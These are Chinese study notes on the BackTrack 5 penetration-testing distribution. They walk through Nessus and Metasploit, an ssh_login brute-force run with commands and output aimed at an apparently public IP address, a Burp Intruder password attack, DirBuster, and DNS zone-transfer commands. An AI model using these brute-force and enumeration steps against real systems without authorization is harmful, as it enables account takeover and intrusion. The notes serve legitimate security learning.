当前位置:首页 >> 计算机软件及应用 >>

BT5学习笔记


BT5 学习笔记(文档建立:2014-1-9)

BT5 学习笔记

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 1 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

目录
BT5 学习笔记............................................................................................................................ 1 BT5 安装.................................................................................................................................... 4 Bt5 下载 ............................................................................................................................ 4 安装................................................................................................................................... 5 设置........................................................................................................................................... 5 系统时间........................................................................................................................... 5 打开 SSH ........................................................................................................................... 6 关闭防火墙....................................................................................................................... 7 列出正在运行的服务 ....................................................................................................... 7 VMware 网卡设置 ............................................................................................................ 7 IP 地址配置....................................................................................................................... 8 重新启动........................................................................................................................... 9 关机................................................................................................................................... 9 常用工具................................................................................................................................. 10 Nmap ............................................................................................................................... 10 Nessus ............................................................................................................................. 10 metasploit ....................................................................................................................... 14 关于渗透测试 ......................................................................................................... 14 启动......................................................................................................................... 15 常用命令................................................................................................................. 16 SSH 暴力破解.......................................................................................................... 20 Burp Suite ........................................................................................................................ 22 W3af ................................................................................................................................ 32 OWASP DirBuster ............................................................................................................ 33 Webgoat .......................................................................................................................... 36 启动(windows) .................................................................................................. 36 问题......................................................................................................................... 37 名词解析................................................................................................................................. 38 跨站脚本攻击................................................................................................................. 38 目录浏览......................................................................................................................... 38 SQL 注入 ......................................................................................................................... 38 HTTP Splitting .................................................................................................................. 38 zone transfer ................................................................................................................ 39 其他......................................................................................................................................... 39 空间不足......................................................................................................................... 39 附录................................................................................................................................. 44 http 响应状态码大全 ............................................................................................. 44 常用链接......................................................................................................................... 46 BT 官方网站............................................................................................................ 46
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 2 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

cvedetails................................................................................................................. 46 Metasploit Unleashed ............................................................................................. 46 md5 在线解密 ........................................................................................................ 46 owasp.org ................................................................................................................ 46 infosec ..................................................................................................................... 46 URL Decoder/Encoder ............................................................................................. 47 php charset encoder ............................................................................................... 47 乌云网..................................................................................................................... 47 典型漏洞......................................................................................................................... 47 3Com 3CDaemon 2.0 revision 10 ............................................................................ 47 后记......................................................................................................................................... 50

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 3 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

BT5 安装
BT5 可以直接使用 iso 启动进入虚拟环境,也可安装在物理机或者 VMware 上,考虑到 软件更新及一些软件需要注册的问题,建议安装到物理机或者 VMwares 虚拟机上 我是装在 vmware 中的,第一次硬盘给了 5G 大小,结果竟然报空间不够,无奈只好分 配了 10G,内存 1G

后查询官方文档:建议 20G 的磁盘空间,建议内存 2G
Bt5 下载
建议直接下载官方的映像,大小为 1.8G,其他地方下载的可能存在密码不正确、软件 缺失问题 http://www.backtrack-linux.org/downloads/ 版本选择(我选择了 Back Track5)

下载好的文件大小大概 1.8G 左右, 为了安全期间, 最好下载完之后执行一下 MD5 运算, 一般不会出什么问题

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 4 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

安装
使用刻录好的光盘或者挂载的 ISO 文件进入系统后, 点击桌面上的 install BackTrack 图标, 依照向导依次点击即可

安装到 99%卡住的问题 等了大概 25 分钟,进度退回到 73%,接着等大概 5 分钟,终于安装完毕(尝试了网上 断掉网卡的办法,没有解决)

重启后即可进入系统了

默认用户名/密码 root / toor

设置
系统时间
时区查看,此处显示为+8,为安装系统时选取的时区 root@bt:~# date -R Fri, 10 Jan 2014 08:35:41 +0800 显示更改系统时间: root@bt:~# date Fri Jan 10 08:36:55 CST 2014 更改为 14:56 root@bt:~# date -s 14:56 Fri Jan 10 14:56:00 CST 2014

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 5 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

打开 SSH
生成 ssh 证书 sshd-generate

启动 ssh 服务 /etc/init.d/ssh start

使用 ssh client 工具连接(此处使用 secureCRT)

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 6 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

关闭防火墙
貌似默认直接可以连接 SSH,无需关闭防火墙

列出正在运行的服务
root@bt:~# ps –ef

VMware 网卡设置
根据自己的环境选择,我选择桥接模式

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 7 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

IP 地址配置
手动配置 IP:此处配置 IP 地址为 192.168.0.100

配置 DHCP 自动获取地址:Dhclient

重启网络服务 /etc/init.d/networking restart

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 8 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

重新启动
reboot

关机
Init 0

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 9 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

常用工具
Nmap Nessus
注册 地址:http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code 选择 home 注册即可

激活: ./nessus –fetch –register “申请的激活码”

启动: root@bt:~# /etc/init.d/nessusd start Starting Nessus : . 登录: https://172.16.1.102:8834/(local 或者本机 IP) 程序开始初始化,正常情况下速度不是很快,我初始化的时候登陆 1 个小时,进度条还 是不断地在循环滚动,后来查出来时磁盘空间不足的问题,解决办法见 空间不足 部分,

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 10 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

终于看到系统登陆界面

输入初始化的用户名和密码即可登陆系统 建立扫描策略

填写策略名称,其他保持默认

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 11 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

保持默认

根据扫描类型选择插件,这里我选择全部插件

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 12 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

保持默认

建立扫描任务

输入任务名称并选择扫描策略

扫描开始
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 13 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

扫描完成

点击 download 可下载报表至本地

metasploit
关于渗透测试
以下内容摘自官方 What is a penetration test? What is penetration testing? Penetration testing, often called “pentesting”,“pen testing”, or “security testing”, is the practice of attacking your own or your clients’ IT systems in the same way a hacker would to identify security holes. Of course, you do this without actually harming the network. The person carrying out a penetration test is called a penetration tester or pentester. Let’s make one thing crystal clear: Penetration testing requires that you get permission from the person who owns the system. Otherwise, you would be hacking the

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 14 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

system, which is illegal in most countries – and trust me, you don’t look good in an orange jump suit. 渗透和黑客的区别:渗透测试需要有系统权限,黑客则不需要 What is a vulnerability(漏洞)? A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows(缓冲区溢出)or SQL injection vulnerabilities.(SQL 注入) What is an exploit(溢出)? To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system. Exploits often deliver a payload to the target system to grant the attacker access to the system. The Metasploit Project host the world’s largest public database of quality-assured exploits. Have a look at our exploit database – it’s right here on the site. Even the name Metasploit comes from the term “exploit”. Metasploit was the first software to provide a common framework for a large selection of exploits. Think of it as an abstraction layer (“Meta”) for exploits (abbreviated “sploits”). Get it? What is a payload(加载)? A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture. Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall.

启动
在 metasploit 中,console 模式最常用
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 15 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

root@bt:/pentest/exploits/framework3# ./msfconsole o 8 8 8 ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 888 8 8 8 8. 8 8 8 'Yb. 8 888 8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: ::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::: o o8P 8 8 8 8 8 8 8 8 o 8

=[ metasploit v3.7.0-release [core:3.7 api:1.0] + -- --=[ 684 exploits - 355 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops 版本为 V3.7.0 684 个溢出模块 355 个辅助模块 217 种加载模块 27 种编码 8 种 nops

常用命令
查看帮助信息 ?或者 help msf > help Core Commands ============= Command ------? back banner cd color connect exit help info irb jobs Description ----------Help menu Move back from the current context Display an awesome metasploit banner Change the current working directory Toggle color Communicate with a host Exit the console Help menu Displays information about one or more module Drop into irb scripting mode Displays and manages jobs
第 16 页 /共 50 页

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享

BT5 学习笔记(文档建立:2014-1-9)

kill load loadpath

Kill a job Load a framework plugin Searches for and loads modules from a path

show msf > show exploits 攻击简单分类 溢出分为主动和被动溢出两种: 主动溢出:针对目标主机的漏洞主动攻击获得控制权限 被动溢出:针对目标主机被动监听然后获取相应的操作 缓冲区溢出: 当计算机向缓冲区填充数据位数超过了缓冲区本身的容量溢出的数据覆盖 在合法数据上, 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符, 但是 绝大大多数程序都会假设数据长度总是与所分配的存储空间相匹配, 这就为缓冲区溢出埋下 隐患。操作系统所使用的缓冲区又被成为“堆栈“,利用缓冲区溢出可导致程序运行失败, 系统死机,重新启动,也可利用其获得非授权指令,甚至系统特权

msf > show payloads

payloads 也就是 shellcode,就是在漏洞成功后要做的事情,设置完选项后,我们可以用 show payloads 查看当前 exploit 可以使用的 payloads 命名规则:操作系统/类型/名称 如 windows/dllinject/reverse_tcp 主要类型: Shell:得到一个 shell Dllinject:上传 DLL 并注入的进程 Patchupxxx:修复漏洞 Upexec:上传并执行一个文件 Meterpreter:高级 payload Vncinject:高级 payload PassiveV:高级 payload
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 17 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

payload 命名规则: shell_find_tag:在一个已建立的链接上创建一个 shell; shell_reverse_tcp:反向连接到攻击者主机并创建一个 shell; bind_tcp:监听一个 tcp 连接 reverse_tcp:反向建立 tcp 连接 reverse_http:通过 HTTP 隧道通信并创建一个新用户添加到管理组 xxx_ipv6_tcp:基于 IPv6 xxx_nonx_tcp:非 No eXecute 或 windows 7(NX 是应用在 CPU 的一种可以防止缓冲区 溢出的技术) xxx_ord_tcp:有序 payload xxx_tcp_allports:在所有可能的端口 Search 搜索 msf > search ms08-067 [*] Searching loaded modules for pattern 'ms08-067'... Exploits ======== Name Disclosure Date Rank Description ------------------ ---- ----------windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption info 查看描述信息

exploit 命名规则:操作系统/服务/模块 如此处的 windows/smb/ms08_067_netapi rank:代表好用程度(normal、good、great)

msf > info windows/smb/ms08_067_netapi Name: Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi Version: 12314 Platform: Windows
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 18 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Provided by: hdm <hdm@metasploit.com> Brett Moore <brett.moore@insomniasec.com> staylor Available targets: Id Name -- ---0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal 6 Windows 2003 SP1 English (NO NX) 7 Windows 2003 SP1 English (NX) 8 Windows 2003 SP1 Japanese (NO NX) 9 Windows 2003 SP2 English (NO NX) Use 使用溢出 msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options 查看选项信息

options 中 required 为必须设定的选项 msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ------------------ -------- ----------RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 19 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Exploit target: Id Name -- ---0 Automatic Targeting

SSH 暴力破解
搜索 ssh 相关模块,此处使用 scanner/ssh/ssh_login msf > search ssh [*] Searching loaded modules for pattern 'ssh'... Auxiliary ========= Name ---fuzzers/ssh/ssh_kexinit_corrupt Corruption fuzzers/ssh/ssh_version_15 fuzzers/ssh/ssh_version_2 fuzzers/ssh/ssh_version_corrupt scanner/ssh/ssh_login scanner/ssh/ssh_login_pubkey Disclosure Date Rank Description --------------- -------------normal SSH Key Exchange Init normal SSH 1.5 Version Fuzzer normal SSH 2.0 Version Fuzzer normal SSH Version Corruption normal SSH Login Check Scanner normal SSH Public Key Login

使用模块 msf > use scanner/ssh/ssh_login msf auxiliary(ssh_login) > 设置相关参数 msf auxiliary(ssh_login) > set FILE_PASS /home/server_pass.txt(此处的密码文件可使用密码生 成工具生成或直接下载密码字典文件) FILE_PASS => /home/server_pass.txt msf auxiliary(ssh_login) > set RHOSTS 59.70.88.3(设置目标主机) RHOSTS => 59.70.88.3 msf auxiliary(ssh_login) > set STOP_ON_SUCCESS yes STOP_ON_SUCCESS => yes msf auxiliary(ssh_login) > set USERNAME root USERNAME => root msf auxiliary(ssh_login) > info Name: SSH Login Check Scanner Module: auxiliary/scanner/ssh/ssh_login
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 20 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Version: 11465 License: Metasploit Framework License (BSD) Rank: Normal Provided by: todb <todb@metasploit.com> Basic options: Name Current Setting Required Description ------------------ -------- ----------BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS 59.70.88.3 yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS yes yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME root no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS true no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Description: This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0502 msf auxiliary(ssh_login) > 开始暴力破解 msf auxiliary(ssh_login) > exploit
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 21 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

[*] 59.70.88.3:22 - SSH - Starting buteforce [*] 59.70.88.3:22 - SSH - Trying: username: 'root' with password: '' [-] 59.70.88.3:22 - SSH - Failed: 'root':'' [*] 59.70.88.3:22 - SSH - Trying: username: 'root' with password: 'root'

Burp Suite
Burp Suite (free edition) is available by default in Backtrack 5. The professional edition can be downloaded from here. Some of the features that are not available in the free edition are Burp Scanner, Task Scheduler, Target Analyzer, etc. BT5 中默认集成了 Burp Suite 的 free 版本,专业版比普通版多了、任务计划、目标分析 等功能 Burp Suite is one of the best tools available for web application testing. Its wide variety of features helps us perform various tasks, from intercepting a request and modifying it on the fly, to scanning a web application for vulnerabilities, to brute forcing login forms, to performing a check for the randomness of session tokens and many other functions.. 用于 web 程序检查,执行各种任务,拦截并修改 http 请求,扫描 web 程序漏洞,暴力 破解等功能,此处以暴力破解为例 程序路径:root@bt:/pentest/web/burpsuite# ls burpsuite_v1.3.03.jar readme - running burp.txt suite.bat terms and conditions.txt 查看 readme 文件可知,burpsuite_v1.3.03.jar 是在 java 环境下的可执行文件,我是通过 ftp 将此文件放入 windows 环境下执行的 burpsuite_v1.3.03.jar readme - running burp.txt suite.bat terms and conditions.txt root@bt:/pentest/web/burpsuite# cat readme\ -\ running\ burp.txt Burp Suite v1.3.03 by PortSwigger (mail@portswigger.net) ==================

Installation instructions ========================= The Burp Suite program is an executable JAR (Java archive) file called burpsuite_v1.3.03.jar Burp Suite requires a Java Runtime Environment, and will run on any platform for which a JRE is
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 22 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

implemented. It requires Java version 1.5 or later, and it is recommended that the latest available JRE is used. JREs for Windows, Linux and Solaris can be obtained for free from http://java.sun.com/j2se/downloads.html Burp Suite can be launched using the command "java -jar burpsuite_v1.3.03.jar". On some platforms, it can be launched simply by double-clicking on the JAR file. Note that the default settings of the JRE Virtual Machine may limit the amount of system resources available to the Burp Suite process. If Burp Suite is to be used for tasks that require large amounts of memory, the VM memory settings should be changed. The file suite.bat launches Surp Suite with up to 512Mb of available memory. This file can be edited to specify a different memory size. Java is a Trade Mark of Sun Microsystems, Inc. 通过 ftp 将 jar 文件传入 windows 环境

以 512M 的内存模式启动(默认大小内存可能不能正常工作) C:\Documents and Settings\Administrator>java C:\Inetpub\ftproot\burpsuite_v1.3.03.jar -jar -Xmx500m

启动界面

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 23 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

以下是各个模块的功能说明: 1) Proxy - Burp Suite comes with a proxy, which runs on port 8080 by default. Using this proxy, we can intercept and modify the traffic as it flows from the client system to the web application. In order to use this proxy, we have to configure our browser to use this proxy. We can also drop the packets if we want so that they do not reach their intended destination, or redirect the traffic to a particular host, etc. 通过在浏览器上设置代理的方式来拦截 http 请求, 并对请求中的数据进行人工处理 2) Spider - The spider feature of Burp Suite is used to crawl web applications looking for new links, content, etc. It automatically submits login forms (through user defined input) in case it finds any, and looks for new content from the responses. This information can then be sent to the Burp Scanner to perform a detailed scan on all the links and content provided by the spider. 收集站点链接和内容,并将收集到的信息提交给其他模块处理 3) Scanner - It is used to scan web applications for vulnerabilities. The type of scanning can be passive, active or user-directed. Some false positives might occur during the tests. It is important to remember that no automated scanner is 100 percent accurate in its results. Unfortunately Burp Scanner is not available with the free edition that is included in Backtrack 5. 扫描 web 程序漏洞,free 版本无此功能 4) Intruder - This feature can be used for various purposes like exploiting vulnerabilities,
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 24 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

fuzzing web applications, carrying out brute force attacks etc. 利用漏洞、 5) Repeater - This feature is used to modify and send the same request a number of times and analyze the responses in all those different cases. 6) Sequencer - This feature is mainly used to check the randomness of session tokens provided by the web application. It performs various advanced tests to figure this out. 7) Decoder - This feature can be used to decode data to get back the original form, or to encode and encrypt data. 8) Comparer - This feature is used to perform a comparison between any two requests, responses or any other form of data. This feature could be useful when comparing the responses with different inputs. 启动后,可以看到代理监听正常

确认 intercept is on 选项已打开

设置 IE 代理

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 25 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

设置完成后,打开 ie 即可看到拦截的 http 请求

打开破解的网页 http://192.168.0.2/admin/Login.asp (这个是我下载的一个 asp 整站程序 的后台登录程序) 点击 forward 转发请求,以便看到登录的页面

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 26 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

随便输入一个用户名和密码,点击确定

Burp 已经拦截到发送的用户名和密码

将请求发送至 intruder 模块

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 27 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

转至 intruder 模块 类型说明: Sniper – This uses a single set of payloads. It targets each position in turn, and inserts each payload into that position in turn. Positions which are not targeted during a given request are not affected – the position markers are removed and any text which appears between them in the template remains unchanged. This attack type is useful for testing a number of data fields individually for a common vulnerability (i.e., cross-site scripting). The total number of requests generated in the attack is the product of the number of positions and the number of payloads in the payload set. battering ram – This uses a single set of payloads. It iterates through the payloads, and inserts the same payload into all of the defined positions at once. This attack type is useful where an attack requires the same input to be inserted in multiple places within the HTTP request (i.e., a username within the cookie header and within the message body). The total number of requests generated in the attack is the number of payloads in the payload set. pitchfork – This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through all payload sets simultaneously, and inserts one payload into each defined position. For example, the first request will insert the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2. The second request will insert the second payload from payload set 1 into
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 28 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

position 1 and the second payload from payload set 2 into position 2, and so on. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the HTTP request (i.e., a username in one data field, and a known ID number corresponding to that username in another data field). The total number of requests generated by the attack is the number of payloads in the smallest payload set. cluster bomb – This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. For example, if there are two payload positions, the attack will place the first payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it will then place the second payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2. This attack type is useful where an attack requires different and unrelated input to be inserted in multiple places within the HTTP request (i.e., a username in one parameter, and an unknown password in another parameter). The total number of requests generated by the attack is the product of the number of payloads in all defined payload sets – this may be extremely large. 将 attack type 更改为 cluster bomb

删除不需要的变量,修改变量名称

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 29 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

设置 username 的数值(此处是固定值为例)

设置 password(此处采用密码字典文件,点击 load 按钮添加) ,字典文件可使用字典工 具生成后者去网上下载现成的文件

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 30 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

完成设置后,点击 start attack 按钮

点击 OK 按钮忽略提示

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 31 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

一般 length 字段不同的即为正确的密码

W3af
Web application Attack and Audit framework ? ? ? discovery plugins find new points of injection audit plugins to find vulnerabilities Grep plugins analyze all page content and find vulnerabilities on pages that are
第 32 页 /共 50 页

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享

BT5 学习笔记(文档建立:2014-1-9)

requested by other plugins; ? Exploit plugins [ab]use the vulnerabilities found in the audit phase and return something useful to the user ( remote shell, SQL table dump, a proxy, etc ). ? Output plugins are the way the framework and the plugins communicate with the user, output plugins save the data to a text or html file. Debugging information is also sent to the plugins and can be saved for analysis. ? Mangle plugins are a way to modify requests and responses based on regular expressions, think “sed (stream editor) for the web”. ? ? Bruteforce plugins will bruteforce logins, they are actually part of the discovery phase. evasion plugins try to evade simple intrusion detection rules.

程序路径 root@bt:/pentest/web/w3af# ls core extlib locales plugins profiles readme scripts tools w3af_console w3af_gui root@bt:/pentest/web/w3af# w3af 有 console 和 gui 两种界面,此处以 console 作为例子 启动 root@bt:/pentest/web/w3af# ./w3af_console WARNING: No route found for IPv6 destination :: (no default route?) w3af>>> 查看程序帮助 help

OWASP DirBuster
软件路径:root@bt:/pentest/web/dirbuster

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 33 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Bt 提供的是一个 Jar 的版本,我这里是下载的 windows 版本 网站目录破解工具 https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

此处还以测试网站为例子,真正的目录结构如下

为节省时间,我这里选择只破解目录名

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 34 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

5 分钟后的扫描结果

由此可见,成功率还是挺高的
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 35 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

Webgoat
WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. You can install and practice with WebGoat in either J2EE (this page) or [WebGoat for .Net] in ASP.NET. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat applications. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson. Webcoat 是一个含有多种漏洞的 web 应用程序环境,可用来作为学习 web 应用安全课 程的实验环境,可运行于 J2EE 或者 ASP.NET 环境中 Why the name "WebGoat"? Developers should not feel bad about not knowing security. Even the best programmers make security errors. What they need is a scapegoat (替罪羊) , right? Just blame it on the 'Goat! 下载 https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

启动(windows)
解压后的目标列表

1. Download the WebGoat-5.X-OWASP_Standard_Win32.zip file from: - http://code.google.com/p/webgoat/downloads/list 2. Unzip the file 3. Double click webgoat.bat 4. Browse to http://localhost/WebGoat/attack 启动前务必确认 80 口未被本机其他应用程序占用 默认用户名和密码:webgoat/webgoat
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 36 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

问题
当 Webgoat 和 webscarab 部署同一台主机不能抓包问题

如果你的 webgoat 和 webscarab 部署在同一台主机,你会发现 webscarab 不能正常获取 webgoat 的 http 请求,解决方法如下(此处以 IE 设置为例,测试 chrome 不存在这个问题) IE 代理设置如下(此时可正常获取处 localhost 之外的其他网站请求)



webgoat

的 访 问 地 址 由

http://localhost/WebGoat/attack

更 改 为

http://localhost./WebGoat/attack 注意:localhost 后面加了一个点号,这不是 WebScarab 的一个 bug,而是 IE 开发人员 所做的一个令人遗憾的设计决策。 如果 IE 觉得您试图访问的服务器位于本地计算机上,它 就会忽略所有的代理设置,欺骗它的一个方法是在主机名后面加一个点 Bypass a Path Based Access Control Scheme

做到这个章节的时候,我用 webscarab 抓包,因为是第一次使用,之前按下 view file 之 后怎么样也抓取不到对应文件的物理路径, 后来才知道是选错类别了, 正确的设置应该如下: 不懂的情况下建议全选

www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 37 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

名词解析
跨站脚本攻击
XSS 又叫 CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往 Web 页面里 插入恶意 html 代码,当用户浏览该页之时,嵌入其中 Web 里面的 html 代码会被执行,从 而达到恶意用户的特殊目的

目录浏览 SQL 注入 HTTP Splitting
HTTP Splitting (or HTTP Response Splitting) is method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol.HTTP Splitting occurs when a attacker inputs arbitrary(随意) headers to control the server response.It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks. http://evilzone.org/tutorials/http-splitting/
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 38 页 /共 50 页

BT5 学习笔记(文档建立:2014-1-9)

zone transfer
备用 DNS 服务器向主用 DNS 服务器请求域数据,主域服务器复制自己的数据给备用服 务器,如为对传输作限制,可能会导致内部主机信息泄漏给攻击方 可以通过检查 TCP53 端口的通讯情况来确定是否存在域传输攻击情况 实施方法: Windows:
nslookup > server <DNS you are querying> > set type=any > ls -d <target>

Unix (nslookup is deprecated on Unix):
dig -axfr @<DNS you are querying> <target>

http://security.stackexchange.com/questions/10452/dns-zone-transfer-attack

其他
空间不足
基本上没装什么东西,竟然报这个错误,估计是临时文件或者 log 文件吧

解决方法: Df 命令查看磁盘空间,确实用完了 root@bt:/# df -h Filesystem /dev/sda1 none none
www.learning-online.cn 百各安全–关注信息安全,致力于及时的、有价值的资料分享 第 39 页 /共 50 页

Size Used Avail Use% Mounted on 7.5G 7.1G 22M 100% / 493M 164K 493M 1% /dev 501M 0 501M 0% /dev/shm

BT5 学习笔记(文档建立:2014-1-9)

none none none root@bt:/#

501M 501M 501M

76K 501M 0 501M 0 501M

1% /var/run 0% /var/lock 0% /lib/init/rw

删除未使用的安装包(我没有通过 apt-get 安装程序,所以运行之后未释放任何空间) root@bt:/# sudo apt-get autoclean Reading package lists... Done Building dependency tree Reading state information... Done 查了一下发现没有什么可以删除的,只好从扩容空间入手 关掉虚拟机-》虚拟机属性-》harddisk 按图示操作将磁盘扩展

